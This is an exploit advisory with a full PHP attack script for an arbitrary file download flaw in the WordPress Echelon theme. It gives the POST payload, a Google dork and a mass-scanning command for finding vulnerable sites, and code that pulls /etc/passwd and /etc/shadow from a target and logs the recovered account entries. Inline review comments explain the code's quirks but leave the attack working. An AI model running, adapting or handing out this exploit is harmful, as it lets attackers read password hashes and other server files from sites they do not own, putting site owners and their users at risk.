*Name:*
Wordpress A.F.D Theme Echelon / INURL - BRASIL

*Description:*
This exploit allows an attacker to download any writable file from the server.

*Usage info:*
Put the path of the file in the exploit's file field, then click the
"Download" button; the file is returned directly.

File download /etc/passwd & /etc/shadow

The flaw lies in the `$_POST` file parameter handled by
/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*POST:*
_mysite_download_skin={$config['file']}&submit=Download
ex:
_mysite_download_skin=/etc/passwd&submit=Download

*Exploit:*



<?php

#===============================================================================
# NAME:         Wordpress A.F.D Theme Echelon
# TIPE:         Arbitrary File Download
# Google DORK:  inurl:/wp-content/themes/echelon
# Vendor:       www.wordpress.org
# Tested on:    Linux
# EXECUTE:      php exploit.php www.alvo.com.br
# OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
# AUTOR:        Cleiton Pinheiro
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#
#
# ------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s
save.txt --comand-all "php exploit.php _TARGET_"
#
# ------------------------------------------------------------------------------
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#===============================================================================

// Runtime setup for the command-line driver. error_reporting(1) keeps only
// E_ERROR, so the notices this script raises further down (undefined
// variables, undefined array keys) are silenced rather than fixed.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
// NOTE(review): allow_url_fopen is a system-level (PHP_INI_SYSTEM) directive,
// so this ini_set() call has no effect at runtime; nothing below relies on
// URL wrappers anyway -- all HTTP goes through curl.
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
// Abort unless a target was given on the command line. The message literal is
// split by a line wrap here, so the newline is part of the text as written.
print empty($argv[1]) ? exit('0x[ERROR]: DEFINA URL / Execute: php
exploit.php www.alvo.com.br') : NULL;
// Prefix a scheme when the argument does not already contain "http". As
// wrapped here the prefix literal contains a raw newline after "http://".
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
// Extract scheme+host (or a bare www./ftp. host) into $alvo_; the first match
// becomes the base URL. Anything that does not match aborts with the same
// usage message as above.
!(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i",
$argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL / Execute: php exploit.php
www.alvo.com.br') : NULL;
// Visual separator used by main() when printing and logging results.
$config['line'] =
"\n------------------------------------------------------------------------------------------------------------------\n";
// Base URL (first regex match) and the theme script path the requests go to.
$config['alvo'] = $alvo_[0][0];
$config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";

function __plus() {
    // Push the PHP output buffer and then the SAPI buffer so each progress
    // line is visible immediately instead of at script end.
    foreach (array('ob_flush', 'flush') as $flushFn) {
        $flushFn();
    }
}

/**
 * Split a raw "k=v&k2=v2" query string into a key => urlencode(value) map.
 *
 * For each '&'-separated pair the value is the segment between the first and
 * second '=' (anything after a second '=' is dropped); a later key overwrites
 * an earlier one. A pair with no '=' leaves the value undefined (a notice)
 * and urlencode() of it yields ''.
 *
 * @param string $query
 * @return array<string, string>
 */
function __convertUrlQuery($query) {
    $encoded = array();
    foreach (explode('&', $query) as $pair) {
        list($name, $rawValue) = explode('=', $pair);
        $encoded[$name] = urlencode($rawValue);
    }
    return $encoded;
}

/**
 * Send one POST request to the theme script and summarise the reply.
 *
 * @param resource|\CurlHandle $curl  handle from curl_init(); closed here
 * @param array $config  reads 'alvo' (base URL), 'exploit' (script path), 'file'
 * @return array{corpo: string|false, server: array, info: string}
 *         'corpo' is response headers plus body (CURLOPT_HEADER is on), or
 *         false if the transfer failed. The FALSE branch of the final return
 *         is unreachable: isset() is true for a false value.
 */
function __request_info($curl, $config) {
    // Form body: the parameter and value named in the advisory above;
    // __convertUrlQuery() urlencodes the file path.
    $postDados =
__convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
    // $postDados_format is never initialised, so the first .= appends to an
    // undefined variable (a notice hidden by error_reporting(1)).
    foreach ($postDados as $campo => $valor) {
        $postDados_format .= $campo . '=' . ($valor) . '&';
    }

    $postDados_format = rtrim($postDados_format, '&');
    // count() is 2 here; CURLOPT_POST only needs a non-zero value.
    curl_setopt($curl, CURLOPT_POST, count($postDados));
    curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
    curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
    // Randomised User-Agent. The numbers change per run, but the fixed
    // "blog.inurl.com.br/" token and the "Linux x8N_6N" platform shape are
    // constant, which makes this client easy to fingerprint in web-server
    // logs. As wrapped here the literal also contains a raw newline.
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0
(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'
. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'
. rand(1, 500) . '.31');
    // Referer is set to the requested script URL itself.
    curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
$config['exploit']);
    // TLS host-name verification is disabled.
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    // Response headers are prepended to the returned string.
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $corpo = curl_exec($curl);
    $server = curl_getinfo($curl);
    $status = NULL;
    // The parentheses are PCRE delimiters, so the patterns are 'HTTP.*',
    // 'Server:.*' and 'Content-Disposition:.*'; '.' stops at the line end, so
    // each pulls one header line. Passing $status['http'] by reference turns
    // the NULL $status into an array.
    preg_match_all('(HTTP.*)', $corpo, $status['http']);
    preg_match_all('(Server:.*)', $corpo, $status['server']);
    preg_match_all('(Content-Disposition:.*)', $corpo,
$status['Content-Disposition']);
    // Any of the three may be absent; [0][0] is then an undefined index that
    // interpolates as ''. CR and LF are stripped so the summary is one line.
    $info = str_replace("\r", '', str_replace("\n", '',
"{$status['http'][0][0]}, {$status['server'][0][0]}
{$status['Content-Disposition'][0][0]}"));
    curl_close($curl);
    unset($curl);
    return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,
'info' => $info) : FALSE;
}

/**
 * Print the verdict for one requested file and append matched lines to disk.
 *
 * The "vulnerable" verdict is the case-insensitive presence of "root" anywhere
 * in $rest['corpo'] (headers included), so any page that merely mentions the
 * word counts as a hit. A failed transfer ('corpo' === false) is reported as
 * NOT VULN, indistinguishable from a genuine negative. Only lines beginning
 * with root:, sbin:, ftp:, nobody: or mail: are collected, i.e. passwd/shadow
 * style entries; nothing else in the response is reported.
 *
 * @param array $config  reads 'file', 'line', 'alvo'
 * @param array $rest    result of __request_info(); only 'corpo' is used
 * @return void
 */
function main($config,$rest) {

    __plus();
    // date("h:m:s") is hour:MONTH:second -- 'm' is the month, minutes are 'i'.
    // The same format is used for every timestamp in this function.
    print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:
{$config['file']}:\n";
    // Parentheses are PCRE delimiters here, so each pattern is e.g. 'root:.*'
    // and matches to the end of the line.
    preg_match_all("(root:.*)", $rest['corpo'], $final);
    preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
    preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
    preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
    preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
    $_final = array_merge($final[0], $final__[0], $final___[0],
$final____[0], $final_____[0]);
    $res = NULL;
    if (preg_match("#root#i", $rest['corpo'])) {
        $res.= "0x " . date("h:m:s") . " [INFO][IS
VULN][RESUME][VALUES]:\n";
        $res.=$config['line'] . "\n";
        foreach ($_final as $value) {
            $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
        }
        $res.=$config['line'];
        __plus();
        // Appends to a relative path, i.e. the current working directory of
        // whoever runs the script; the file is an artifact on that host.
        file_put_contents('EXPLOIT_WPAFD_Echelon.txt',
"{$config['alvo']}\n{$res}\n", FILE_APPEND);
        print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
    } else {

        print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
    }
}
// Driver: one request per file, each reported by main(). The banner literal
// is split by a line wrap, so the newline is part of the printed text.
print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL -
BRASIL\n";
$config['file'] = '/etc/passwd';
// A fresh curl handle per request; __request_info() closes it.
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
// $line is never assigned anywhere in this script (the separator lives in
// $config['line']), so this prints nothing; the notice is hidden.
print $line;
// One-line summary of status line / Server / Content-Disposition headers.
print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
main($config,$rest);
__plus();
$config['file'] = '/etc/shadow';
$rest = __request_info($objcurl = curl_init(), $config);
__plus();
main($config,$rest);
__plus();